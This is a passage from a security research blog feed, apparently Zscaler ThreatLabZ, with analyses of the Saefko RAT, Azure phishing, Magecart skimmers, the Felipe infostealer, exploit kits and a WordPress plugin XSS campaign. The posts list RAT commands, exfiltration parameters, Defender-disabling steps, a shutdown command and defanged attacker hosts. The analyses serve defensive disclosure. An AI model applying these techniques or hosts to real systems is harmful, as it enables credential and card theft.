6669 irc.evolu.net 6667 irc.explosionirc.net 6667 irc.fdfnet.net 6668 irc.fef.net 6667       Saefko connects to one of these servers and waits for a response. In the response, it checks for “T_T” string and any separate messages using that string. Below is the list of IRC functions that the RAT can perform. According to the command it receives, Saefko will respond with corresponding data. List of IRC Commands IRC Command Description dexe Download a file from a given URL and execute it hdexe Download a file from a given URL and execute it (UseShellExecute=false) vistpage Open URL hvistpage Open URL (UseShellExecute = false) snapshot Captures video frame, converts into Base64 and sends to C&C (Detailed information explained below); also replies “.oksnapshot” shell Executes command using cmd.exe tcp Makes a tcp connection using a given IP and port. identify Send system information: OS type: Microsoft windows OS version: OS version OS Username: username OS MachineName: System name OS SystemDirectory: System Directory opencd Open CDROM drive. Command: set CDAudio door open closecd Close CDROM drive. Command: set CDAudio door closed screenshot Capture screenshot, encode it into Base64 and send to C&C ping Reply “okping” camlist Gets the video devices from the system and sends information to the C&C.Detailed information explained below. pwd Current directory location Gets the system location using “https://ipinfo.io/geo” IP, city, region, country, latitude and longitude keylogs Encode the keylog file (log.txt) using base64 and send it to C&C uninstall Delete the autostart registry key (RUN) and terminate itself.   Camlist Saefko also searches for the following payloads in the system: AForge.dll AForge.Video.DirectShow.dll AForge.Video.dll Sqlite3.dll If these files are not present, the malware sends a request to the C&C to download these files. Next, it searches for a list of video input devices on the targeted system and sends the related information to the C&C. Snapshot Saefko also captures videos from the device present on the system, encodes the video frame with Base64 and sends it to the C&C. Start USB Service Saefko checks to see if the drive type is either removable or networked, after which it starts the infection and copies the files below onto a removable drive. Sas.exe USBStart.exe usbspread.vbs Sas.exe is a copy of the malware itself. USBStart.exe is fetched from the resource section of the main binary. It contains code to execute Sas.exe. It creates a usbspread.vbs file then executes it. It searches every directory and all the files and creates a "lnk" file for each file and directory with a target path USBStart.exe file. When the removable device is plugged in any other system, the user is tricked into clicking a lnk file as the main files and folder are hidden. Lnk file executes the USBStart.exe that ends up executing Sas.exe which is the main payload. So it futher infect other Systems. Below is the code of the usbspread.vbs file: One online forum has an ad for a cracked Saefko RAT tool as shown below. It is a multi-protocol, multi-operating system remote administration tool that can be used to launch the malware on Windows and Android devices.   Conclusion To protect systems from RATs, users must refrain from downloading programs or opening attachments that aren't from a trusted source. At the administrative level, it's always a good idea to block unused ports, turn off unused services, and monitor outgoing traffic. Attackers are often careful to prevent the malware from doing too much activity at once, which would slow down the system and possibly attract the attention of the user and IT. Zscaler ThreatLabZ team continues to monitor this threat and others to ensure that Zscaler customers are protected.   IOCs Md5: D9B0ECCCA3AF50E9309489848EB59924 C4825334DA8AA7EA9E81B6CE18F9C15F 952572F16A955745A50AAF703C30437C 4F2607FAEC3CB30DC8C476C7029F9046 7CCCB06681E7D62B2315761DBE3C81F9 5B516EAB606DC3CC35B0494643129058 Downloader URL: industry.aeconex[.]com/receipt-inv.zip 3.121.182[.]157/dwd/explorer.exe 3.121.182[.]157/dwd/vmp.exe deqwrqwer.kl[.]com.ua/ex/explorer.exe maprivate[.]date/dhl-miss%20craciun%20ana%20maria%20#bw20feb19.zip Network URL: acpananma[.]com/love/server.php 3.121.182[.]157/smth/server.php f0278951.xsph[.]ru/server.php maprivate[.]date/server.php
Categories: Security Posts

Abusing Microsoft’s Azure domains to host phishing attacks

Zscaler Research - 52 min 35 sec ago
Recently, the Zscaler ThreatLabZ team came across various phishing attacks leveraging Microsoft Azure custom domains. These sites are signed with a Microsoft SSL certificate, so they are unlikely to raise suspicion about their authenticity. We notified Microsoft, who quickly engaged to shut these sites down, while we took action to detect and block 2,000 phishing attempts from these domains over a six-week period.  In this blog, we will describe two of the prominent vectors used and we’ll show several examples of the phishing pages. The following figure depicts the phishing hits that were hosted using the Azure domain (Windows.net) and blocked by the Zscaler cloud. Fig 1: Phishing hits using the Azure domain web.core.windows.net (green) and blob.core.windows.net (orange)   The following is the Whois lookup information related to the Windows.net domain. Fig 2: Whois lookup info for domain Windows.net domain   For these phishing campaigns, the delivery vector was spam emails. CASE 1: In this case, the attacker sends a spam email to a user, appearing to come from a particular organization and notifying the user that seven emails have been quarantined. It states that in order to review the emails, the user has to log in using the work or school account. Fig 3: Spam email with direct phishing link   If the user clicks the view emails button, it will redirect to the Outlook login phishing page (hxxps://onemailofice365(.)z13(.)web(.)core(.)windows(.)net/index(.)html). Fig 4: Outlook login phishing page   Some users may get confused because of the unknown URL hosting the Outlook login page. To trick those users, the attackers have used the SSL certificate issued by Microsoft as shown below. Fig 5: SSL certificate page of the hosted phishing URL   The following figure depicts the source code of the phishing page, which is used by attackers to collect users’ data. Fig 6: Source code of the phishing URL page   Once the login information has been entered by the user, the form will post the user’s credential details to the compromised domain that is operated by the cybercriminals. Fig 7: Captured data traffic that has been sent to the attacker’s site   CASE 2: In this method, attackers send the spam email with an attached HTML file that looks like a voice message. Once the user clicks the HTML file, it will redirect to the phishing page hosted using the Azure domain. Fig 8: Spam mail with double extension method   Fig 9: Outlook login phishing page redirected from voice message   In this phishing campaign, the attackers have injected obfuscated JavaScript to validate the user credentials that are present in their database to avoid duplication. Fig 10: Obfuscated JavaScript to validate user credentials to avoid duplication   The following figure depicts the deobfuscated JavaScript. This code will validate the user’s credential details and sent it to the attacker’s server (hxxps://validr2vtap2l3eh544kb(.)azurewebsites(.)net/v20(.)php). Fig 11: Deobfuscated JavaScript Fig 12: User data will be sent to the attacker’s site using the function getValidatorURL().   In addition to the Outlook phishing campaigns, we have seen phishing campaigns associated with these Azure domains: Microsoft Phishing, OneDrive Phishing, Adobe Document Phishing, Blockchain Phishing, and more. The following figure shows the different phishing campaigns that are hosted using the Azure domain (Windows.net). Fig 13: Microsoft login phishing page   Fig 14: Adobe login phishing page   Fig 15: Blockchain login phishing page   Fig 16: OneDrive login phishing page   Conclusion The Zscaler cloud blocked more than 2,000 phishing attacks over six weeks that were hosted using the Azure domain (Windows.net). The following diagram represents the various kinds of phishing campaigns that were blocked by the Zscaler cloud. Fig 17: Detected phishing hits    Fig 18: The Zscaler Zulu URL Risk Analyzer score for one of the phishing URLs   IOCs 039282fsd(.)z19(.)web(.)core(.)windows(.)net 3652adua38ea(.)z5(.)web(.)core(.)windows(.)net 378468459jjn(.)z19(.)web(.)core(.)windows(.)net 623623626638885047749469(.)z19(.)web(.)core(.)windows(.)net 86hoi2a8j592hf2(.)z14(.)web(.)core(.)windows(.)net accounhostoutlook(.)z35(.)web(.)core(.)windows(.)net accountsupdate(.)z22(.)web(.)core(.)windows(.)net adobe111(.)z19(.)web(.)core(.)windows(.)net appriver(.)z19(.)web(.)core(.)windows(.)net azaman(.)blob(.)core(.)windows(.)net bchwalletblockchain(.)z13(.)web(.)core(.)windows(.)net bitcoinwalletrecovery(.)z13(.)web(.)core(.)windows(.)net blockchainofficesupport(.)z13(.)web(.)core(.)windows(.)net blockchainrecoverywalet(.)z13(.)web(.)core(.)windows(.)net blockchaintradindinvest(.)z13(.)web(.)core(.)windows(.)net businessdrivefilesharing(.)z33(.)web(.)core(.)windows(.)net dlgeus(.)blob(.)core(.)windows(.)net dlgneu(.)blob(.)core(.)windows(.)net dlgweu(.)blob(.)core(.)windows(.)net driveoffice- secondary(.)z13(.)web(.)core(.)windows(.)net eastexch030serverdatanet(.)z13(.)web(.)core(.)windows(.)net edustudioapp(.)z19(.)web(.)core(.)windows(.)net exchangeonline80293745(.)z27(.)web(.)core(.)windows(.)net finance51(.)z13(.)web(.)core(.)windows(.)net fukshawefwe22(.)blob(.)core(.)windows(.)net fundingmessan(.)z13(.)web(.)core(.)windows(.)net gry1asdqw1(.)blob(.)core(.)windows(.)net h0vbkkkeebweybv(.)z33(.)web(.)core(.)windows(.)net hgnghhghkkdkdh(.)z13(.)web(.)core(.)windows(.)net hp94549754083400j9302975(.)z21(.)web(.)core(.)windows(.)net hsdv(.)blob(.)core(.)windows(.)net linknec39cclzg5l591f(.)z19(.)web(.)core(.)windows(.)net linkp4klg1qkni76yoz8(.)z19(.)web(.)core(.)windows(.)net lpdmsonline(.)blob(.)core(.)windows(.)net macrofinancesoftonline(.)z14(.)web(.)core(.)windows(.)net macrosoft0nlineoffice365(.)z13(.)web(.)core(.)windows(.)net mailingofficeupdate(.)z14(.)web(.)core(.)windows(.)net mailofficemicr0softvalid(.)z35(.)web(.)core(.)windows(.)net mailofficesecurity(.)z13(.)web(.)core(.)windows(.)net mailofficeveridiers(.)z33(.)web(.)core(.)windows(.)net mailoutlookmcrosoftupdat(.)z11(.)web(.)core(.)windows(.)net mailoutnewsecurity(.)z14(.)web(.)core(.)windows(.)net mak17opa54vjxu8(.)z7(.)web(.)core(.)windows(.)net mdj34598720843(.)z10(.)web(.)core(.)windows(.)net microexchyz42nhszseheys(.)z13(.)web(.)core(.)windows(.)net micromuze3rlokoyg(.)z14(.)web(.)core(.)windows(.)net microrel00ukelukleqwkoxl(.)z13(.)web(.)core(.)windows(.)net microsofbt50xjotm45wm7al(.)z11(.)web(.)core(.)windows(.)net microsofd8f82gtrjyaajnsj(.)z11(.)web(.)core(.)windows(.)net microsofdi3o152rpnnt2zr8(.)z11(.)web(.)core(.)windows(.)net microsoffn4xwr5df3emnh1m(.)z11(.)web(.)core(.)windows(.)net microsofn642b7o2un27wptm(.)z13(.)web(.)core(.)windows(.)net microsofq2622c5r3wpfsdnp(.)z11(.)web(.)core(.)windows(.)net microsofzwafvh6bisrici50(.)z11(.)web(.)core(.)windows(.)net offic664ghdtsgdyddux(.)z13(.)web(.)core(.)windows(.)net officcee(.)z13(.)web(.)core(.)windows(.)net office365user37773773673(.)z19(.)web(.)core(.)windows(.)net officedelist(.)z13(.)web(.)core(.)windows(.)net officefiledata(.)z13(.)web(.)core(.)windows(.)net onemailofice365(.)z13(.)web(.)core(.)windows(.)net outlookloffice365user23k-secondary(.)z14(.)web(.)core(.)windows(.)net outlookloffice365user25u-secondary(.)z33(.)web(.)core(.)windows(.)net outlookloffice365user65t-secondary(.)z6(.)web(.)core(.)windows(.)net outlookloffice365user65t(.)z6(.)web(.)core(.)windows(.)net outlookloffice365userl6m(.)z13(.)web(.)core(.)windows(.)net outlookofficecom(.)z33(.)web(.)core(.)windows(.)net outlookproctionmail(.)z9(.)web(.)core(.)windows(.)net outwebsignin2094598209(.)z21(.)web(.)core(.)windows(.)net parmalat7(.)blob(.)core(.)windows(.)net pjkiojxyfngsss(.)z13(.)web(.)core(.)windows(.)net pssastd(.)blob(.)core(.)windows(.)net rel00ukelukleqwkoxl(.)z6(.)web(.)core(.)windows(.)net sams2948818388301(.)z13(.)web(.)core(.)windows(.)net secureofficeportal(.)z19(.)web(.)core(.)windows(.)net sharepo7(.)z22(.)web(.)core(.)windows(.)net sharepointewk8xpzoywq7j(.)z19(.)web(.)core(.)windows(.)net supportoffices365(.)z33(.)web(.)core(.)windows(.)net thursday(.)z19(.)web(.)core(.)windows(.)net ttsokaejqumuamreio(.)z6(.)web(.)core(.)windows(.)net under12(.)z19(.)web(.)core(.)windows(.)net user111777999973sdxc(.)z11(.)web(.)core(.)windows(.)net user37377377733(.)z22(.)web(.)core(.)windows(.)net user7779793e792782(.)z14(.)web(.)core(.)windows(.)net user8877773737(.)z11(.)web(.)core(.)windows(.)net usernamewebmailsingin(.)z14(.)web(.)core(.)windows(.)net v83oybtn5zp5mmz(.)z14(.)web(.)core(.)windows(.)net validatnec39cclzg5l591f(.)z19(.)web(.)core(.)windows(.)net voice88(.)z19(.)web(.)core(.)windows(.)net voicserel00ukeluklwkoxl(.)z13(.)web(.)core(.)windows(.)net webusermicr0softtonlinee(.)z33(.)web(.)core(.)windows(.)net were12(.)z19(.)web(.)core(.)windows(.)net weree(.)z6(.)web(.)core(.)windows(.)net wimdowoutlkjxjy0846335f(.)z13(.)web(.)core(.)windows(.)net yamma(.)z13(.)web(.)core(.)windows(.)net zebra11(.)z19(.)web(.)core(.)windows(.)net azaman(.)blob(.)core(.)windows(.)net dlgeus(.)blob(.)core(.)windows(.)net dlgneu(.)blob(.)core(.)windows(.)net fiattt(.)blob(.)core(.)windows(.)net fukshawefwe22(.)blob(.)core(.)windows(.)net gry1asdqw1(.)blob(.)core(.)windows(.)net hsdv(.)blob(.)core(.)windows(.)net parmalat7(.)blob(.)core(.)windows(.)net funksha1(.)blob(.)core(.)windows(.)net
Categories: Security Posts

Magecart activity and campaign enhancements

Zscaler Research - 52 min 35 sec ago
Magecart is a hacker group known for skimming credit or debit card details by injecting malicious JavaScript code into e-commerce sites. Back in September 2018, the Zscaler ThreatLabZ research team published a blog on Magecart activity that analyzed its attack methods and evasion tactics. We are now following up on that blog to report on recent activity we’ve seen and some enhancements in the campaign.   Magecart attack chain In the recent campaign, we noticed a change in the attack chain. One example is the use of heavily obfuscated JavaScript with encrypted data. Also, in some cases, the malicious JavaScript code is now being injected directly in the compromised e-commerce sites, whereas in earlier attacks, the malicious code was injected remotely. Fig 1: Hits of compromised websites in the last three months   1. Injecting heavily obfuscated malicious JavaScript dynamically The below credit card stealer JavaScript payload is dynamically loaded when the victim presses the checkout button after loading the cart. Fig 2: Heavily obfuscated malicious JavaScript code injected on the checkout page   The ThreatLabZ team’s smart crawler with heuristic detection shows that various JavaScript functions are obfuscated in the payload. Fig 3: Crawler’s heuristic detection Fig 4: Malicious script after three levels of deobfuscation by the crawler.   Analysis of the skimming toolkit The above discussed malicious script looks for the keywords “onepage|checkout|onestep|firecheckout” in the URL and, if found, injects another script from hxxps://dnsden[.]biz/a.js. Fig 5: Script injected from hxxps://dnsden[.]biz   The above injected obfuscated script hxxps://dnsden[.]biz/a.js contains encrypted data which is decrypted by the RC4 algorithm in the runtime.   Fig 6: Use of RC4 algorithm in ‘a.js’   The encrypted data in ‘a.js’ script after RC4 decryption ends up injecting the main skimming script, which is responsible for extracting and sending the victim's credit card details back to the attacker. Encrypted data - w5rDvcOKwrnCnsKYcWHCgAcaUsOFVcOQXnZpw48KfjZ/CMObMMOiwq7Cm1XDvFDCl8KBEsKRE8Oyw6krWcK0wo1Xw7J+w6/DknoJasKVScKZOhzCoRI= Decrypted data - The ‘universal.js’ is also obfuscated and has the same encryption algorithm as ‘a.js’. After decryption, it calls a function on the form change event and collects all the payment info entered by the victim. Fig 7: Collecting payment card details Fig 8: Sends victim’s credit card details to C&C   Fig 9: POST request with the stolen credit card details   info=Base64(stolen_data)&hostname=compromised_site&key=random_key Stolen data includes billing and payment details. Fig 10: Decoded stolen data   2. Injecting malicious JavaScript directly in the compromised site   Fig 11: Malicious JavaScript code hosted on the compromised e-commerce site is injected   Fig 12: Malicious JavaScript code hosted on a compromised site for skimming payment card details   Analysis of the skimming toolkit The malicious JavaScript code first checks for the two cookie names “$s” and “$sent”; if these cookies are set, data is stored into variable after decoding. These cookie values are referred to each time any payment card details are being entered, and values are updated if the payment card details are new. Fig 13: Getting values from the two cookie names “$s” and “$sent”   To get payment card details, data from all the tags, such as input, select, and text area, are stored and the script undergoes a basic length check on the card details. Fig 14: Validating length of payment card details   After validating payment card details, a hash of the card details is calculated and checked to determine if the same hash value is available in the data retrieved from the cookie “$sent” earlier. Payment details are dropped if any hash match is found. Fig 15: Checking the hash value of card details against data retrieved earlier from the cookie   Each time any new payment card details are entered, the details are sent to the attacker and the hash value for these details is appended to the cookie value “$sent”;  this cookie value is used to check if the details being entered are new. Fig 16: Value of the cookie “$sent” stored in the victim's browser   On decoding the above Base64 encoded value of the cookie “$sent,” we get the MD5 array of the payment card details. By storing the encrypted payment card details as a cookie, the attacker has added the ability to drop duplicate details being sent to the attacker, as payment details are always checked against the cookie value and only unique card details are sent to the attacker. After all the above checks are encoded, the payment card details are sent to the attacker-controlled site. Fig 17: GET request with the stolen information   In a similar skimming toolkit, along with the above-discussed cookie logic, attackers are injecting fake payment card fields into the compromised site and hiding legitimate fields once the victim selects credit card as the payment method. Fig 18: Fake credit card details field and malicious JavaScript file   Fig 19: HTML code for the fake credit card details fields in the malicious script   Fig 20: Malicious script injecting the fake credit card details fields   Fig 21: Above, injected credit card fields; below, legitimate credit card fields   The injected and legitimate credit card fields look similar, but from the HTML input field attributes (ID and type), there are noticeable differences. In the injected fields, the card number ID is "_ccnumber" and the type is "text," while in a legitimate card number, the ID is "credit-card-number" and the type is "tel."   IOCs dnsden[.]biz jquery-bin[.]com/gate[.]php lumbertrans[.]com/errors/default/gate[.]php luxbagsgirl[.]com/errors/default/gate[.]php jsreload[.]pw/gate[.]php saterday-race[.]com/gate[.]php jqueryextd[.]at/gate[.]php routingzen[.]com/gate[.]php mz-at-shop[.]de/errors/default/gate[.]php 93[.]187[.]129[.]249/gate[.]php developer-js[.]info/gate[.]php google-anaiytic[.]com/fonts[.]googleapis/gate[.]php magento-analytics[.]com/gate[.]php gtows[.]com   Compromised sites shop.triggerbrothers[.]com[.]au custommagnetsdirect[.]com lumbertrans[.]com sunbuggy[.]com saterday-race[.]com windblox[.]com cakedecoratingsolutions[.]com[.]au network-ed[.]com[.]au adooq[.]com mz-at-shop[.]des reddotarms[.]com sprucela[.]com/ t[.]cltradingfl[.]com worldcraftindustries[.]com reallifecatholic[.]com wbminternational[.]com whistlerrides[.]ca/ smartsilk[.]com/ classictruckglass[.]com oconnellsclothing[.]com/skin/ purefruittechnologies[.]com/ cornerstone-arch[.]com minitruckusa[.]com magformers[.]com ravishingcosmetics[.]com alamoshoes[.]com/ salonsavings[.]com/ bathroompanelsuperstore[.]com britishfitness[.]com bumperworksonline[.]com niftyconcept[.]com cornerstone-arch[.]com decorprice[.]com   Conclusion These new developments in an ongoing campaign illustrate some of the ways that attackers are continuously enhancing their methods for stealing sensitive information like login credentials, bank or payment card details, personally identifiable information, and so on. The Magecart campaign has been active for a long time and continues to evolve and hone its techniques to get better at stealing payment card information and related data.  Zscaler ThreatLabZ actively tracks such campaigns and protects customers from these types of attacks.  
Categories: Security Posts

Felipe, a new infostealer Trojan

Zscaler Research - 52 min 35 sec ago
The Zscaler ThreatLabZ team came across a new strain of infostealer Trojan called Felipe, which silently installs itself onto a user’s system and connects to a command-and-control (C&C) server to send system information from the compromised system. This malware is compiled for both 32-bit and 64-bit Windows operating systems. Felipe basically steals the victim's debit and credit card information and sends it, along with other personal information, to the remote C&C server. It also sets a date and time to perform other malicious activity upon successful infection of the victim machine. The files dropped by malware include: Win XP: %UserProfile%\Local Settings\Temp\vshost.exe %UserProfile%\Local Settings\Temp\explorer32.exe %UserProfile%\Local Settings\Temp\install2.bat %UserProfile%\Local Settings\Temp\infect.txt Win7/Win10: %UserProfile%\AppData\Local\Temp\vshost.exe %UserProfile%\AppData\Local\Temp\explorer32.exe %UserProfile%\AppData\Local\Temp\install2.bat %UserProfile%\AppData\Local\Temp\infect.txt The Felipe Trojan enumerates the system and tries to determine whether it has already been infected by checking the files vshost32.exe and vshost64.exe in the compromised system. The parent file downloads its payloads to %UserProfile%\AppData\Local\Temp\update2804. If this folder already exists, the malware deletes the folder and files inside. Once the folder is deleted, the malware will create a new folder with the same name in hidden mode.   When the update2804 folder is created, the malware downloads its different payloads within a gap of just 50 milliseconds. After downloading the payload, the malware copies it to a special directory temp folder in the system in hidden mode and executes it. First, it will execute the install2.bat file and then it will execute vshost.exe. Below is the code of install2.bat: The batch file will perform registry changes responsible for the following: Run entries for vshost.exe, exolorer32.exe to ensure persistence Disable Windows Defender Bypass UAC control Excluding path of temp folder in Windows Defender Vshost.exe checks the victim's bank cards by checking a card's length or the starting numbers of cards, such as: American Express card: number should begin from 34 or 37 Visa: card length between 13 or 16 Mastercard: card length to be 16 Discover: card length to be 16 and begin from 6011 or 65 Below is a snapshot of some of these instructions: The following is the algorithm to check the card's validity: Process digits from right to left. Double the alternate digit starting from first. Break the alternative digits if addition is greater than 10 (e.g., 28 = 2 + 8 (10) or 19 = 1 + 9 (10)). Return the 10's complement of the total. Finally, it verifies the checksum digit. It will be invalid if the checksum is not modular 10. Snapshot of the algorithm:   If the system is already infected, the malware looks for the filename infect.txt in the temp folder. If it is already there, it sends the below data; otherwise, it sends a request to the C&C to further download the file infect.text. It also sends the victim's system information and writes “infect” in the infect.txt file. The Felipe Trojan gets a memory dump of processes by checking the memory addresses that can store data. Basically, it scans the process memory and, whenever a process starts, the system allocates enough memory for its heap, stack, and regions. However, Windows won't allocate an "entire block" of memory; it tries to allocate any free memory available for the User-Mode. The following are the methods used for the memory dump: GetSystemInfo() Retrieves random information about the system in a structure called SYSTEM_INFO. This structure also contains two variables: minimumApplicationAddress & maximumApplicationAddress, which store the minimum and the maximum address where the system can allocate memory for User-Mode applications. VirtualQueryEx() This method gets information about a range of memory addresses and returns it into a structure named MEMORY_BASIC_INFORMATION. It tells us the range of a memory chunk that starts from the specified address. ReadProcessMemory() Used to read a number of bytes starting from a specific memory address. OpenProcess() Returns a handle to a specific process; the process must be opened. WriteProcessMemory() Writes data to an area of memory in a specified process. After the memory dump, the malware tries to find the victim's used bank card from memory, and fetches this information to send to the C&C. Below is a snapshot of it: Encryption method for sending data to C&C: The malware uses Triple Data Encryption Standard (3DES) algorithm. The first step is to create a simple wrapper class that encapsulates the 3DES algorithm and stores the encrypted data as a base-64 encoded string. Then, that wrapper is used to securely store private user data in a publicly accessible text file.  The 3DES algorithm provides two-way encryption. It needs the private key string as the wrapper to generate a unique decrypted string. Here, the malware uses "L%f@Y7Boolean4%()F$y" as a private key. For more info: https://docs.microsoft.com/en-us/dotnet/visual-basic/programming-guide/…   Sending data to the C&C:   The malware uses the free “geoPlugin” web service to determine the victim's system and location information. The following are the services used by the malware from the geoPlugin web service: System IP City Region code Country name Timer Set: The malware sets the time in the program to shut down the system and restart on a specific day. In this example, the time should be between 5:06 a.m. and 6:09 a.m. on Friday, then the system gets shut down. The command to shutdown is: Interaction.Shell("shutdown /r /t 0", AppWinStyle.MinimizedFocus, false, -1); Switches: /r: shut down and then restart the local computer /t: time, in seconds, between the execution of the shutdown command and the actual shutdown or restart AppWinStyle.MinimizedFocus: starts the program minimized and with focus   After the restart, the malware fetches hardware information from the victim's system, including the serial number and running processes. If the “explorer32.exe” process is not found in the running processes, the malware downloads from the C&C and executes it from the temp folder for performing further malicious activities. It uses the GetAsyncKeyState() Win API to query the state of each key on the keyboard. From the return value of GetAsyncKeyState(), it can be determined whether the key is up or down at the time the function is called.   Network communication:   Indicators of Compromise: Filename Md5 vshost.exe 15CE8F849FFF4CC8675900EC838A93F9 down.exe 61B06E49D514F3DC5BE4F4EF08F6B43C explorer32.exe D912771C8CD5720AD835E08EB80A77B6 install2.bat 7D016A3BB29904A6E00161694FC6AB4E Download URLs: 192.99.215[.]95/uploads Inmemory[.]tech
Categories: Security Posts

Top exploit kit activity roundup – Spring 2019

Zscaler Research - 52 min 35 sec ago
This is the tenth in a series of quarterly roundups by the Zscaler ThreatLabZ research team in which we collect and analyze the activity of the top exploit kits over the last three months. Exploit kits (EKs) are rapidly deployable software packages designed to leverage vulnerabilities in web browsers and deliver a malicious payload to a victim’s computer. Authors of EKs offer their services for a fee, distributing malware for other malicious actors. What follows are highlights from the EK activity we observed during the last quarter.   RIG EK Rig EK has continued to be active through the quarter. Though EK activity has declined overall, RIG EK activity has been persistent. We saw no changes in the kit behavior as compared to the previous quarter. Below we can see the hits for RIG EK activity. Figure 1: RIG EK hits from 1 March 2019 to 20 May 2019. The geographical distribution of RIG EK hits is shown below. Figure 2: RIG EK heat map showing infection regions One instance of RIG EK activity can be seen below. Figure 3: RIG EK infection cycle The obfuscated JavaScript on the landing page is shown below. Figure 4: RIG EK Landing page Obfuscated JavaScript. We observed the use of two malicious scripts on the landing page, the first one being CVE-2016-0189, which is a Scripting Engine Memory Corruption Vulnerability targeting IE 11 and below. The second script was CVE-2018-8174, which is a Windows VBScript Engine Remote Code Execution vulnerability targeting Windows 10, 7, and 8.1, and Windows Server 2008, 2012, and 2016. We also saw the use of Adobe Flash exploit CVE-2018-4878, which is a use-after-free vulnerability in Adobe Flash Player version 28.0.0.161 and earlier. The snippet of code targeting the CVE-2018-4878 vulnerability can be seen in the decompiled flash file below. Figure 5: Decompiled Flash exploit in RIG EK cycle; CVE-2018-4878 The malware payloads seen with RIG EK this quarter belonged to the SmokeLoader and AZORult families.   Underminer EK Underminer EK is relatively new and we started seeing activity for this EK over the past six months. We see this exploit kit serving its payloads over custom HTTP ports. The recent hits for Underminer EK are shown below. Figure 6: Underminer EK Hits from 1 March 2019 to 20 May 2019.   The geographical distribution of Underminer EK hits is shown below. Figure 7: Underminer EK heat map showing infection regions.   An infection cycle for Underminer EK is shown below. Figure 8: Underminer EK infection cycle   The majority of the activity that we have seen for Underminer EK starts with a malvertising campaign involving a popcash[.]net URL that redirects users to a malicious domain, adpop[.]live. The malicious domain serves content over HTTPS which further redirects the user to the Underminer EK landing page. The call for the Underminer EK on the malicious domain adpop[.]live is shown below. Figure 9: Underminer EK landing page call on malvertisement page   This landing page contains a call to the malicious SWF payload. This call can be seen in the screenshot below. Figure 10: Underminer EK call for Flash exploit   The malware payload seen in this cycle was a bootkit Trojan.   Spelevo EK We started seeing activity for a new exploit lit called Spelevo in March 2019. Spelevo EK authors integrated the relatively new Flash Exploit CVE-2018-15982. The hits for Spelevo EK activity are shown below. Figure 11: Spelevo EK Hits from 1 March 2019 to 20 May 2019   The geographical distribution of Spelevo EK hits is shown below. Figure 12: Spelevo EK heat map showing infection regions   An infection cycle for Spelevo EK is shown below. Figure 13: Spelevo EK infection cycle   The image below shows the Spelevo EK malvertisement redirect to the EK landing page. Figure 14: Spelevo EK malvertisement redirect   Spelevo EK landing page contains an obfuscated JavaScript Browser Plugin Detect script to determine the Adobe Flash player version that the user's system is running. The obfuscated JavaScript along with the decoded script is shown in the image below. Figure 15:  Spelevo EK landing page and deobfuscated browser plugin detect JavaScript   The same page serves a redirect URL based on the conditions met. Figure 16: Spelevo EK Flash Player plugin detect   Once the Adobe Flash version is found to be vulnerable, the user is served a malicious SWF file which is a use-after-free vulnerability (CVE-2018-15982) in Adobe Flash Player versions 31.0.0.153 and earlier. The cycle did not serve any malware payload on our test machine but malware activity have been reported on successful exploitation in the wild.   Other exploit kits We also observed some exploit kit activities directed towards routers and focused on hijacking DNS queries. A snippet of scan code served by a router exploit kit is shown below. Figure 17: Scan script served by a router exploit kit   Based on the target IP addresses seen online, the script then calls another obfuscated malicious JavaScript; a sample script served by such an exploit kit can be seen below. Figure 18: Obfuscated JavaScript on a router exploit kit landing page   A Base64 decoded version of the landing page shows the DNS hijacking script below. In this screenshot we see the script trying to target the gateway IP with default credentials. In this case, the script is attempting to log in with user name "admin" and an empty password. If the attempt is successful, the DNS address is modified to the attacker's DNS address (158.255.7[.]150) along with a backup legitimate public DNS address (8.8.4[.]4). Figure 19: Base64 decoded JavaScript showing the DNS hijacking configuration   Another instance of a default credential being used to target routers is shown below. Figure 20: Default credentials being targeted by router exploit kits   Here we see password "gvt12345" being used along with the username "admin." A quick Google search for this password pattern reveals that this might have been used as default password by a few Brazilian ISPs and has been used before in similar attacks. Checking the name resolution using the attacker's DNS server shows the DNS redirect behavior in action, as shown below. Figure 21:  DNS resolution using the attacker’s DNS server shows name resolution to a phishing IP   In this case, the server IP resolved by the DNS server for www.google[.]com is a malicious server that is controlled by the attacker and used to serve phishing content to victims. GrandSoft EK, Magnitude EK, and Fallout EK did not show changes during the quarter. We did not see activity this quarter for other recent exploit kits such as Terror EK, KaiXin EK, and Disdain EK.   Conclusion This quarter we saw the addition of Spelevo and Underminer to the exploit kit threat landscape, and we saw some EK activity targeting routers. Exploit kits are effective, as they can infect a victim's machine during web browsing without the user's knowledge. The attackers monetize the successful infections in a variety of ways, such as by collecting a ransom for retrieving data encrypted by ransomware, mining cryptocurrencies using the victim's system resources, or installing banking Trojans to steal a victim's identity. Attackers frequently change their techniques by obfuscating the source code or integrating new exploit codes into their EKs, and security researchers analyze and block the new threats by tracking changes in the EK behavior.   To help avoid infections from exploit kits, users should always block untrusted third-party scripts and resources, and avoid clicking on suspicious advertisements. Keeping browser plugins and web browsers up to date with the latest patches helps to protect against common vulnerabilities targeted by exploit kits. The Zscaler ThreatLabZ research team has confirmed coverage for these top exploit kits and subsequent payloads, ensuring protection for organizations using the Zscaler cloud security platform.  
Categories: Security Posts

Malicious JavaScript injected into WordPress sites using the latest plugin vulnerability

Zscaler Research - 52 min 35 sec ago
WordPress is by far the most popular content management system (CMS) and, because of its wide usage, it is also popular among cybercriminals. Most of the WordPress sites that have been compromised are the result of attackers exploiting vulnerable versions of the plugins used. A stored cross-site script vulnerability was discovered last week in the popular WordPress Live Chat Support plugin. The vulnerability allows an unauthenticated attacker to update the plugin settings by calling an unprotected "admin_init hook" and injecting malicious JavaScript code everywhere on the site where Live Chat Support appears. All versions of this plugin prior to version 8.0.27 are vulnerable. The patched version for this vulnerability was released on May 16, 2019,  and has been fixed for version 8.0.27 and higher. ThreatLabZ researchers recently discovered what may be the first campaign in which attackers are exploiting the Live Chat Support plugin vulnerability and injecting a malicious script that is responsible for malicious redirection, pushing unwanted pop-ups and fake subscriptions. While it is not yet seen as a widespread attack, the number of compromised websites is growing (at the end of this blog there is a link to the names of the compromised sites). Fig 1: Hits of the compromised WordPress sites Fig 2: WordPress site using a vulnerable version of the Live Chat Support plugin   Fig 3: Obfuscated script injected in the compromised WordPress site   Fig 4: Deobfuscated version of the injected script   The injected script sends a request to the URL hxxps://blackawardago[.]com to execute the main script. Fig 5: Request and response to the hxxps://blackawardago[.]com   After the execution of the above script, the victim is redirected to multiple URLs, mainly related to pushing unwanted popup ads and fake error messages. Fig 6: Highlighted (red) multiple redirected URLs after the execution of the malicious script.   Fig 7: Popups after execution of the malicious script   The domain that hosts the malicious script is a newly created domain hosted on a dedicated IP address. Fig 8: Whois information of the domain   Conclusion Cybercriminals actively look for new vulnerabilities in popular content management systems such as WordPress and Drupal, as well as popular the plugins that are found in many websites. An unpatched vulnerability in either the CMS or associated plugins provides an entry 